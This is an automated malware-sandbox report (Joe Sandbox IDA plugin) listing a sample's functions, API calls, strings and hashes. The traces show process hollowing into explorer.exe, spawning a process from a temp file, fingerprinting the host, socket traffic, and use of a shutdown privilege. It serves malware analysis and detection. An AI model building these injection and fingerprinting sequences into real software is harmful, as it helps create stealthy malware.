Function 011F5E70 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 011F5E8D
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 011F5EA1
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 011F5EAC
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 011F5EB7
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 011F5EC2
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 011F5ECD
GetTempPathW.KERNEL32(000000F6,?), ref: 011F5EE6

Part of subcall function 011F24A0: GetTickCount.KERNEL32 ref: 011F24A2

wnsprintfW.SHLWAPI ref: 011F5F21
PathCombineW.SHLWAPI(?,?,?), ref: 011F5F3B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 011F5F62
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011F5F86
SetEndOfFile.KERNEL32(00000000), ref: 011F5F89
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F5F96
wnsprintfW.SHLWAPI ref: 011F5FB4
RtlInitUnicodeString.NTDLL(?,?), ref: 011F5FCA
RtlInitUnicodeString.NTDLL(?,?), ref: 011F5FD7
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 011F6016
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F6065
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 011F60AF
FlushFileBuffers.KERNEL32(00000000), ref: 011F60B7
SetEndOfFile.KERNEL32(00000000), ref: 011F60BE
NtQueryInformationProcess.NTDLL ref: 011F60D3
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 011F60FB
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 011F6152
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 011F618E
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 011F619C
NtClose.NTDLL ref: 011F61D5
NtClose.NTDLL ref: 011F61E6
NtClose.NTDLL ref: 011F61F0
CloseHandle.KERNEL32(00000000), ref: 011F61F3

Strings

RtlCreateProcessParametersEx, xrefs: 011F5EAE
NtCreateProcessEx, xrefs: 011F5EA3
NtCreateThreadEx, xrefs: 011F5EC4
.exe, xrefs: 011F5EFF
RtlDestroyProcessParameters, xrefs: 011F5EB9
NtCreateSection, xrefs: 011F5E9B
%08x%s, xrefs: 011F5F10
"%s", xrefs: 011F5FA3
ntdll, xrefs: 011F5E85

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: 9609eec604fdd15595130e9f444d2c262ae07b42381a4a5aa6342b2246f8f704
Instruction ID: 400ae6c507a7f46140e0c5068cdc0e1fe8548d50b91c3053cc48ae5dfe2a204e
Opcode Fuzzy Hash: 9609eec604fdd15595130e9f444d2c262ae07b42381a4a5aa6342b2246f8f704
Instruction Fuzzy Hash: F1B149B1A40219BBEB24DBA5CC49FAEBBBCEB44704F104069F715F7181D775AA40CB68

Function 011F5AF0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 011F5B13
GetProcAddress.KERNEL32(00000000), ref: 011F5B1A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 011F5BDD
NtQueryInformationProcess.NTDLL ref: 011F5BFA
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 011F5C14
GetThreadContext.KERNEL32(?,00010007), ref: 011F5C24
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 011F5C58
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 011F5C82
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 011F5CBB
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 011F5DA2
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 011F5DBA
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 011F5E15
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 011F5E30
ResumeThread.KERNEL32(?,?,?,00000000), ref: 011F5E39
CloseHandle.KERNEL32(?), ref: 011F5E48
CloseHandle.KERNEL32(00000000), ref: 011F5E4D

Strings

NtUnmapViewOfSection, xrefs: 011F5B09
.reloc, xrefs: 011F5D0F
C:\Windows\system32\explorer.exe, xrefs: 011F5B60, 011F5BDC
C:\Windows\system32\certutil.exe, xrefs: 011F5B50
ntdll, xrefs: 011F5B0E

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: 6c6f695117257abbefdd14b19fe3e28f4badc1b93f84835b902980df2ec13df1
Instruction ID: 42fdc572249cbbf03e91669f9dadac521cc2a24847848c2e7683c1ba3725f64a
Opcode Fuzzy Hash: 6c6f695117257abbefdd14b19fe3e28f4badc1b93f84835b902980df2ec13df1
Instruction Fuzzy Hash: 9EB18071E00219AFDF68CF98DC84BADBBB6FF48704F2440A9EA19E7291D7319941CB54

Function 011F7650 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,011FA060,00000001,?), ref: 011F768C
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 011F769F
GetProcessHeap.KERNEL32(00000008,?), ref: 011F76BB
HeapAlloc.KERNEL32(00000000), ref: 011F76C2
LsaFreeMemory.ADVAPI32(?), ref: 011F76FC
LsaClose.ADVAPI32(?), ref: 011F7705
GetComputerNameW.KERNEL32(?,?), ref: 011F7724
GetUserNameW.ADVAPI32(?,00000101), ref: 011F7735
wsprintfA.USER32 ref: 011F77B6
wsprintfA.USER32 ref: 011F77E9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F7840
HeapFree.KERNEL32(00000000), ref: 011F7843
GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F784C
HeapFree.KERNEL32(00000000), ref: 011F784F

Strings

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 011F7746
%s|%d.%d (%d)|%S|%S|%S, xrefs: 011F77E3
%d|%s|%.16s|, xrefs: 011F77B0

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 3257352186-369990036
Opcode ID: ffed4d8f630f1361bc6dac470acacf380f755d52a6f2c0616f6b8c92a898ff0b
Instruction ID: 3343023365d9a536b115027071de7f3c9d71526c8449c66f271f199e5ed9e72b
Opcode Fuzzy Hash: ffed4d8f630f1361bc6dac470acacf380f755d52a6f2c0616f6b8c92a898ff0b
Instruction Fuzzy Hash: D751C271A00259AFEB29CFA4CD44BEEBFB9BF44704F0441ADEA44E7141D7709A45CBA0

Function 011F7860 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 011F78AA
wnsprintfA.SHLWAPI ref: 011F7942
wsprintfA.USER32 ref: 011F7969
lstrcmpA.KERNEL32(?,Start), ref: 011F7BEB
EnterCriticalSection.KERNEL32(011FA080), ref: 011F7C44
GetProcessHeap.KERNEL32(00000008,?), ref: 011F7CA8
HeapAlloc.KERNEL32(00000000), ref: 011F7CAF
GetProcessHeap.KERNEL32(00000008,?,?), ref: 011F7CBA
HeapReAlloc.KERNEL32(00000000), ref: 011F7CC1
LeaveCriticalSection.KERNEL32(011FA080), ref: 011F7D18

Part of subcall function 011F5E70: GetModuleHandleW.KERNEL32(ntdll), ref: 011F5E8D
Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 011F5EA1
Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 011F5EAC
Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 011F5EB7
Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 011F5EC2
Part of subcall function 011F5E70: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 011F5ECD
Part of subcall function 011F5E70: GetTempPathW.KERNEL32(000000F6,?), ref: 011F5EE6
Part of subcall function 011F5E70: wnsprintfW.SHLWAPI ref: 011F5F21
Part of subcall function 011F5E70: PathCombineW.SHLWAPI(?,?,?), ref: 011F5F3B
Part of subcall function 011F5E70: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 011F5F62
Part of subcall function 011F5E70: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011F5F86
Part of subcall function 011F5E70: SetEndOfFile.KERNEL32(00000000), ref: 011F5F89
Part of subcall function 011F5E70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 011F5F96
Part of subcall function 011F5E70: wnsprintfW.SHLWAPI ref: 011F5FB4

GetProcessHeap.KERNEL32(00000000,?), ref: 011F7D37
HeapFree.KERNEL32(00000000), ref: 011F7D3E

Strings

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 011F78E0
%d|%s|%.16s|, xrefs: 011F7931
%s|%s, xrefs: 011F7963
Start, xrefs: 011F7BE5

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: 58dd2ce40fdf4c3160d6902cbab1218f8ba6b8e6136d34bbdddddb06c4f0450f
Instruction ID: 03ea44d278ec40087fa91d80a7021ad1b962849c89c137f6487a6f7c86787377
Opcode Fuzzy Hash: 58dd2ce40fdf4c3160d6902cbab1218f8ba6b8e6136d34bbdddddb06c4f0450f
Instruction Fuzzy Hash: AEE11431E042568FEB2D8F68D854B7E7BB2BF85200F1D81ADCB5697286DB309945CB90

Function 011F8340 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362

Part of subcall function 011F7010: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 011F7047
Part of subcall function 011F7010: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 011F7063
Part of subcall function 011F7010: GetProcessHeap.KERNEL32(00000008,?), ref: 011F7072
Part of subcall function 011F7010: HeapAlloc.KERNEL32(00000000), ref: 011F7079
Part of subcall function 011F7010: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 011F7096
Part of subcall function 011F7010: RegCloseKey.ADVAPI32(80000002), ref: 011F70A8

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
wsprintfA.USER32 ref: 011F83FF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
GetLastError.KERNEL32 ref: 011F841E
ExitProcess.KERNEL32 ref: 011F8523

Part of subcall function 011F24A0: GetTickCount.KERNEL32 ref: 011F24A2

WSAStartup.WS2_32(00000202,?), ref: 011F845C
CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491
CoInitializeEx.OLE32(00000000,00000000), ref: 011F84DC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 011F84F3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 011F8512

Strings

C:\, xrefs: 011F838A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011F8469, 011F8486
%temp%\%paths%, xrefs: 011F84EE

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: 512abd2c72c6a8ef7620e184b7baa08d38830858ad46ba7e0f121fc2fe39ded5
Instruction ID: 46b789ce2858a4fc54f73b725c299fdb5e7b4d195cd275a251d22b1e34d6ca6c
Opcode Fuzzy Hash: 512abd2c72c6a8ef7620e184b7baa08d38830858ad46ba7e0f121fc2fe39ded5
Instruction Fuzzy Hash: 2141C170A48308BAE728DF60ED0EFA97678BB04705F14806DF719EA185EBB456848B59

Function 011F8316 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362
GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
wsprintfA.USER32 ref: 011F83FF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
GetLastError.KERNEL32 ref: 011F841E
WSAStartup.WS2_32(00000202,?), ref: 011F845C
CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491
CoInitializeEx.OLE32(00000000,00000000), ref: 011F84DC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 011F84F3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 011F8512

Strings

C:\, xrefs: 011F838A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011F8469, 011F8486
%temp%\%paths%, xrefs: 011F84EE

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptInitialize$CriticalEnvironmentErrorExpandFileFromInformationLastMutexSectionStartupStringStringsVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3830145718-2941900213
Opcode ID: 856c8239a2694351da8fa4265c9f3ea6f5def2290e477dbf5bd04d997cc4f9c1
Instruction ID: 0316a80820972987fed0524559fa471dac525c959d88767871d5aab826825ca9
Opcode Fuzzy Hash: 856c8239a2694351da8fa4265c9f3ea6f5def2290e477dbf5bd04d997cc4f9c1
Instruction Fuzzy Hash: 5E51D370A44309ABE72CCF60EC4AF9977B8FF04704F14807DE619EB185EBB456448B48

Function 011F62B0 Relevance: 24.1, APIs: 16, Instructions: 136networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 011F62D0
htons.WS2_32(?), ref: 011F62EC
inet_pton.WS2_32(00000002,?,?), ref: 011F62FE
htons.WS2_32(?), ref: 011F6305
socket.WS2_32(00000002,00000001,00000006), ref: 011F6318
connect.WS2_32(00000000,?,00000010), ref: 011F6333
socket.WS2_32(00000002,00000001,00000006), ref: 011F6344
connect.WS2_32(00000000,?,00000010), ref: 011F6359
select.WS2_32(00000000,?), ref: 011F6381
recv.WS2_32(?,?,00000400,00000000), ref: 011F63B4
send.WS2_32(00000000,?,00000000,00000000), ref: 011F63DA
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 011F640C
closesocket.WS2_32(00000000), ref: 011F6422
closesocket.WS2_32(00000000), ref: 011F6429
GetProcessHeap.KERNEL32(00000000,?), ref: 011F6434
HeapFree.KERNEL32(00000000), ref: 011F643B

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 1922096520-0
Opcode ID: b46dcdfb5db8e88867fb6acc61763efb765a90aa0468c4646ce0b882709b2269
Instruction ID: 9461443902129a16312f99f663f4569f2ee8b203b1b9358215e68bafd9c1ab48
Opcode Fuzzy Hash: b46dcdfb5db8e88867fb6acc61763efb765a90aa0468c4646ce0b882709b2269
Instruction Fuzzy Hash: B1417C71148304ABD724AFA4DC89B6ABBEDEB88710F10092EF755D71D0D3B0D8458B66

Function 011F8F40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 011F8F58

Part of subcall function 011F2640: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,011F8FA5,00000000), ref: 011F2662
Part of subcall function 011F2640: HeapAlloc.KERNEL32(00000000,?,?,?,?,011F8FA5,00000000), ref: 011F2669

GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F8FB5
HeapFree.KERNEL32(00000000), ref: 011F8FBC
wsprintfA.USER32 ref: 011F8FEF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9028
HeapFree.KERNEL32(00000000), ref: 011F902B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9030
HeapFree.KERNEL32(00000000), ref: 011F9033

Strings

%d|%s|%s|%s, xrefs: 011F8FE9
VoYGkc5R, xrefs: 011F8FD7

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$VoYGkc5R
API String ID: 4113358155-4073333701
Opcode ID: ff0fb8acda50ab541396a772b3b2cc02c6b3ccfebe987ee005ce8c1520f4938c
Instruction ID: 05185ac6f14bc8dded7ab47d71ba6db284c6fd7916c366c45761a47e349ffc29
Opcode Fuzzy Hash: ff0fb8acda50ab541396a772b3b2cc02c6b3ccfebe987ee005ce8c1520f4938c
Instruction Fuzzy Hash: B5210871E043086BE728ABA4EC09FEF7B3DDF44614F04012CEB18A7185EB659915C7A6

Function 011F6210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 011F621D
OpenProcessToken.ADVAPI32(00000000), ref: 011F6224
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 011F6239
CloseHandle.KERNEL32(?), ref: 011F6246
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 011F6270
CloseHandle.KERNEL32(?), ref: 011F627B

Strings

SeShutdownPrivilege, xrefs: 011F6232

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 901ede800b86963bba1ef4a6e873e1d648c13f5fe61ba17a7b64dfd7d341bf97
Instruction ID: a4cc7de8db9d5b81b0e5c55b78b39d469cf7c1fd111334f7fcfddf2a309823bb
Opcode Fuzzy Hash: 901ede800b86963bba1ef4a6e873e1d648c13f5fe61ba17a7b64dfd7d341bf97
Instruction Fuzzy Hash: 6801A231A45208FBDB209FE4DD0EFEE7BBCEB04701F100068FA15E6180D7704A5497A5

Function 0079421C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00794228
IsDebuggerPresent.KERNEL32 ref: 007942F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00794314
UnhandledExceptionFilter.KERNEL32(?), ref: 0079431E

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2257d9c26c05bb3da1bc982d9616153fcee5474eb6231374b1cc9c4c122186ce
Instruction ID: 1bc48ac3d8170397d06aa44c0c065bbaeae74e5fddd6539e5186efc5ed699354
Opcode Fuzzy Hash: 2257d9c26c05bb3da1bc982d9616153fcee5474eb6231374b1cc9c4c122186ce
Instruction Fuzzy Hash: BC312975D0525CDBDF20DFA4E989BCDBBB8BF18304F5080AAE40CAB250EB755A858F05

Function 0079695B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00796A53
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00796A5D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00796A6A

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4861f67bd0549d7c725927d953e9729b4732a1b26391eb8efa90df51e21669cf
Instruction ID: 9153eff5d09be0b55df77a5c6948f922051b89270d71bd9cc1cdfe2539094f4a
Opcode Fuzzy Hash: 4861f67bd0549d7c725927d953e9729b4732a1b26391eb8efa90df51e21669cf
Instruction Fuzzy Hash: E531A4759012299BCF21DF64EC89B9DBBB8BF48710F5082EAE41CA7250E7749F858F44

Function 007975A2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,007975A1,?,?,?,?,?,0079C8FA), ref: 007975C4
TerminateProcess.KERNEL32(00000000,?,007975A1,?,?,?,?,?,0079C8FA), ref: 007975CB
ExitProcess.KERNEL32 ref: 007975DD

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: aa5c98773a3aa283dbeef73ab1cfe14334a132aa0fb343b00b25bd806f9eda23
Instruction ID: 00d531304355c296e872c4193522c8996e77ad56c53ddf67a53e7d1ea6fff295
Opcode Fuzzy Hash: aa5c98773a3aa283dbeef73ab1cfe14334a132aa0fb343b00b25bd806f9eda23
Instruction Fuzzy Hash: 56E08C31020588EFDF152F58EE8C9493B68EB81342F428014FA08C6131CF3DDD92CB65

Function 0079E87D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0079E878,?,?,00000008,?,?,0079E510,00000000), ref: 0079EAAA

Memory Dump Source

